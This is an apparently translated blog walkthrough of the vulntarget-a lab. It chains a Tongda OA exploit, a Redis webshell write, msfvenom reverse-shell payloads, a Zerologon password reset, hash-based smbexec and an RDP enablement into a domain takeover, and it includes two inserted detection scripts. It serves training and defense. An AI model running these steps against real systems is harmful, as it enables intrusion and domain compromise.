[Range Walkthrough] vulntarget-a vulnerable range walkthrough

Disclaimer

The technical articles on this public account are for reference only. The information in this article is provided solely so that security personnel can test or maintain the websites, servers, etc. (including but not limited to) for which they are responsible. Do not use the technical material in this article to intrude into any computer system without authorization. Any direct or indirect consequences and losses resulting from the use of the information provided here are the sole responsibility of the user. The tools provided in this article are for learning only and must not be used for any other purpose!!!

Range introduction

The vulntarget-a vulnerable range was designed and built by the vulntarget team itself and covers web vulnerabilities, host vulnerabilities, domain vulnerabilities, ICS vulnerabilities and more.

Range topology

The topology diagram above is for reference only; the addresses used in this walkthrough are configured as follows:

Kali attack box: 192.168.52.128

Win11 attack box: 192.168.52.1

Win7 application server: 192.168.52.129, 10.0.20.98

Win2016 domain member server: 10.0.20.99, 10.0.10.111

Win2019 domain controller: 10.0.10.110

Range walkthrough

If you want to build and design it yourself, see: http://mp.weixin.qq.com/s?__biz=Mzg3NDYwNjQyMw==&mid=2247486312&idx=1&sn=1bd4a6edcd6bc0133215d2fb79abe53b&chksm=cecf7150f9b8f846820c14ff5df467afe67e913b8592715bf7bf76cb011c407df6ead15819d3&scene=21#wechat_redirect

Taking the application server via the Tongda OA vulnerability

Approach: the application server is taken mainly through the Tongda OA vulnerability; it could also be taken through EternalBlue, with much the same idea.
This walkthrough uses the range environment provided by the vulntarget team directly. After the servers were set up, the Win7 address was scanned for open ports and services:

Port 80 is open; after visiting it and identifying the application as Tongda OA, the tool is used directly to test it.

Once a shell is obtained, connect to it with AntSword or Godzilla.

Run a command to check the current network adapters; the host has two.
ipconfig; if the output is garbled, set the encoding to GB2312 in the basic configuration.

Moving the session to CS and MSF

To make session management and post-exploitation easier, it is recommended to move the session to CS and MSF.

CS session

Upload the CS payload to the target server

Run the payload to obtain a CS session

MSF session

The second layer of the range is designed to be reached through Redis, so Kali tools are used for testing.

Generate the reverse payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 LPORT=5555 -f exe > /root/msfshell/5555.exe

Listen with msf

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options 

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LhOST 192.168.52.128
LhOST => 192.168.52.128
msf6 exploit(multi/handler) > set LPORT 
LPORT => 4444
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.52.128   yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.52.128:5555 
[*] Sending stage (201798 bytes) to 192.168.52.129
[*] Meterpreter session 1 opened (192.168.52.128:5555 -> 192.168.52.129:51972) at 2024-06-18 16:55:10 +0800


On the Win7 application server, run the payload through Godzilla; the msf session is obtained successfully.
Add routes, set up a proxy, and use arp to find IPs on the internal segment.

meterpreter > run post/multi/manage/autoroute 

[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.20.0          255.255.255.0      Session 20
   192.168.52.0       255.255.255.0      Session 20

With the routes added, use socks_proxy to start a SOCKS proxy service

msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface
                                       to listen on. This must be an addres
                                       s on the local machine or 0.0.0.0 to
                                        listen on all addresses.
   SRVPORT  2222             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted:
                                       4a, 5)


   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server



View the full module info with the info, or info -d command.

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

[*] Starting the SOCKS proxy server

With the SOCKS proxy running, proxychains4 is needed; configure it before use
sudo vim /etc/proxychains4.conf

In the shell, use arp -a to look for addresses outside the 192.168.52.0/24 segment

10.0.20.99 is found; scan it with nmap. Because only common ports are scanned, port 6379 is not picked up.
sudo proxychains4 nmap -sT -Pn 10.0.20.99

Scan the Redis port directly. Root privileges are needed for the scan, otherwise the port shows up as filtered.
sudo proxychains4 nmap -sT -p 6379 -Pn 10.0.20.99

Redis unauthorized access to gain server access

Use Redis unauthorized access together with the PHP web environment to get a shell
Write a webshell via the Redis unauthorized-access vulnerability

└─$ sudo proxychains4 redis-cli -h 10.0.20.99                                                                          
[sudo] kali 的密码:
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  192.168.52.128:2222  ...  10.0.20.99:6379  ...  OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379> 
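Defensive counterpart to the write sequence above, added here and not part of the original post: a Python detector that replays `redis-cli MONITOR` output (constructed sample lines, not captured from the lab) and flags a client that points `dir` at a web root, sets a script `dbfilename`, and then calls SAVE or BGSAVE. The `WEB_ROOT_HINTS` and `SCRIPT_EXTS` heuristics are my own assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of `redis-cli MONITOR` output (not captured from the lab), modelled
# on the write sequence used above. Format: <ts> [<db> <client>] "cmd" "arg" ...
SAMPLE_MONITOR = """\
1718700000.100001 [0 10.0.20.98:51230] "PING"
1718700000.200002 [0 10.0.20.98:51230] "config" "set" "dir" "C:/phpStudy/PHPTutorial/WWW/"
1718700000.300003 [0 10.0.20.98:51230] "config" "set" "dbfilename" "tx.php"
1718700000.400004 [0 10.0.20.98:51230] "set" "1" "<?php @eval($_POST['tx']);?>"
1718700000.500005 [0 10.0.20.98:51230] "save"
1718700001.000006 [0 10.0.20.50:40000] "config" "set" "dir" "C:/redis/data/"
1718700001.100007 [0 10.0.20.50:40000] "bgsave"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')                # one double-quoted argument
WEB_ROOT_HINTS = ("www", "htdocs", "wwwroot", "inetpub", "public_html")  # assumed heuristic
SCRIPT_EXTS = (".php", ".jsp", ".jspx", ".asp", ".aspx")

def parse_monitor(text):
    """Yield (timestamp, client, [args]) for every well-formed MONITOR line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield float(m["ts"]), m["client"], ARG_RE.findall(m["rest"])

def detect_webshell_writes(text):
    """Track CONFIG SET dir/dbfilename per client; alert when a SAVE/BGSAVE would
    persist the RDB dump as a script file inside a directory that looks like a web root."""
    staged = defaultdict(dict)   # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for ts, client, args in parse_monitor(text):
        lowered = [a.lower() for a in args]
        if lowered[:2] == ["config", "set"] and len(args) >= 4:
            staged[client][lowered[2]] = args[3]
        elif lowered[:1] in (["save"], ["bgsave"]):
            d = staged[client].get("dir", "")
            f = staged[client].get("dbfilename", "")
            if any(h in d.lower() for h in WEB_ROOT_HINTS) and f.lower().endswith(SCRIPT_EXTS):
                alerts.append({"ts": ts, "client": client,
                               "path": d.rstrip("/\\") + "/" + f})
    return alerts

if __name__ == "__main__":
    for a in detect_webshell_writes(SAMPLE_MONITOR):
        print(f"[ALERT] {a['client']} wrote RDB dump to {a['path']} at {a['ts']:.0f}")
```

The same sequence is blocked outright by `requirepass`, `rename-command CONFIG ""` and a loopback-only `bind` in redis.conf; the monitor only catches what those settings would have prevented.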

After the shell is written, connect with Godzilla or AntSword
To connect with AntSword, configure the proxy first


Here I went straight for a reverse connection and generated a reverse payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.20.98 LPORT=5555 -f exe -o 123.exe
Upload it to the second-layer target, the Win2016 server, and execute it
Listen with msf on Kali

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.20.98
set LPORT 5555
options


Once it runs, the msf session is obtained

Enter a shell and run ipconfig to check the adapters
The address 10.0.10.111 is found
The current privilege level is administrator

Taking the Win2019 domain controller

Locating the domain controller

meterpreter > run post/windows/gather/enum_domain

[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)

Domain controller IP obtained: 10.0.10.110

Account: WIN-UKFQSV1OMUB

Domain: balsec.com

Add the route again:
run post/multi/manage/autoroute

Check the current routing information

Test whether the domain controller 10.0.10.110 can be scanned, using nmap

Direct in-domain privilege escalation

Test whether the vulnerability exists on the domain controller

sudo proxychains4 python3 zerologon_tester.py win2019 10.0.10.110

A result of success proves the vulnerability exists

Use the exploit directly

Use the zerologon tool to blank the domain controller's password

(The account blanked here is the computer account of the machine the DC runs on, not a domain account.)

sudo proxychains4 python3 cve-2020-1472-exploit.py win2019 10.0.10.110
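Added detection example, mine and not from the original post or the zerologon tools: the exploit step above resets the DC's computer-account password, which Windows records as Security event 4742 with ANONYMOUS LOGON (S-1-5-7) as the subject, and a DC that still accepts vulnerable Netlogon channels logs event 5829. The function below scans constructed event records for both; the record layout, times and SIDs are assumed.

```python
ANONYMOUS_SID = "S-1-5-7"   # well-known SID behind the "ANONYMOUS LOGON" subject

# Constructed Security-log records (not from the lab), reduced to the fields a SIEM keeps.
# The account name follows the lab's DC (win2019); times and SIDs are invented.
SAMPLE_EVENTS = [
    {"id": 5829, "time": "2024-06-18T16:59:40", "account": "WIN2019$"},
    {"id": 4742, "time": "2024-06-18T17:01:03", "subject": "ANONYMOUS LOGON",
     "subject_sid": ANONYMOUS_SID, "target": "WIN2019$", "changed": ["Password Last Set"]},
    # routine machine-account password rotation: the account changes itself, not anonymous
    {"id": 4742, "time": "2024-06-18T17:05:00", "subject": "WIN2019$",
     "subject_sid": "S-1-5-21-1111-2222-3333-1000", "target": "WIN2019$",
     "changed": ["Password Last Set"]},
    # an admin editing a workstation's SPNs: not a password reset and not a DC
    {"id": 4742, "time": "2024-06-18T17:06:00", "subject": "Administrator",
     "subject_sid": "S-1-5-21-1111-2222-3333-500", "target": "WS01$",
     "changed": ["Service Principal Names"]},
]

def find_zerologon_indicators(events, dc_accounts):
    """Flag 4742 events where ANONYMOUS LOGON reset a domain controller's machine-account
    password (the direct trace of the CVE-2020-1472 reset step), and list accounts named
    in 5829 events, which show the DC still allows vulnerable Netlogon secure channels."""
    dc_accounts = {a.upper() for a in dc_accounts}
    resets, vulnerable = [], []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] == 5829:
            vulnerable.append(e["account"].upper())
        elif (e["id"] == 4742 and e.get("subject_sid") == ANONYMOUS_SID
              and e.get("target", "").upper() in dc_accounts
              and "Password Last Set" in e.get("changed", [])):
            resets.append({"time": e["time"], "account": e["target"].upper()})
    return {"anonymous_dc_resets": resets,
            "vulnerable_channels_allowed": sorted(set(vulnerable))}

if __name__ == "__main__":
    report = find_zerologon_indicators(SAMPLE_EVENTS, ["WIN2019$"])
    for r in report["anonymous_dc_resets"]:
        print(f"[ALERT] {r['time']} anonymous password reset of DC account {r['account']}")
    for acct in report["vulnerable_channels_allowed"]:
        print(f"[WARN] vulnerable Netlogon channel allowed for {acct}: enforce secure RPC")
```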

Dump the domain controller hashes; cd into the example directory:


That takes the domain controller directly
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
Enable 3389 remote desktop

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Log in directly over 3389: proxychains4 rdesktop 10.0.10.110

Account: balsec.com\administrator  Password: Admin@666


Posted 2024-06-19 13:22 by 小C学安全